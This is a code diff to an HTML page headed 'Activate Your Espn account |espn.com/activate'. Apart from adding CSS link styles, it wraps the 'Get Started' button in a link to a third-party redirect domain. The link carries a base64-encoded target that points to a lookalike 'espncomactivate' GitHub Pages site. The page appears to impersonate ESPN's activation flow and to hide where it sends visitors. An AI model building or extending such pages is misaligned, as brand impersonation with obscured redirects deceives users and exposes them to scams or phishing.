--- a/index.html
+++ b/index.html
@@ -161,6 +161,20 @@
             border: 1px solid #ffeeba;
             border-radius: 5px;
         }
+        
+        a {
+  color: #333;
+  text-decoration: none;
+  transition: color 0.3s, background-color 0.3s; /* Smooth transition */
+  padding: 5px 10px; /* Padding around the link */
+  border-radius: 5px; /* Rounded corners */
+}
+
+a:hover {
+
+
+  text-decoration: none;
+}
     </style>
 </head>
 <body>
@@ -175,7 +189,7 @@
         <img src="ESPN-HOZ.jpg" alt="Cover Image">
         <div id="button-container">
             <h1>Activate Your Espn account |espn.com/activate</h1>
-             <button id="button">Get Started</button>
+        <button id="button"><a href="https://ww0.us?aHR0cHM6Ly9lc3BuY29tYWN0aXZhdGUuZ2l0aHViLmlv">Get Started</a></button>
         </div>
     </div>
     <div class="container">
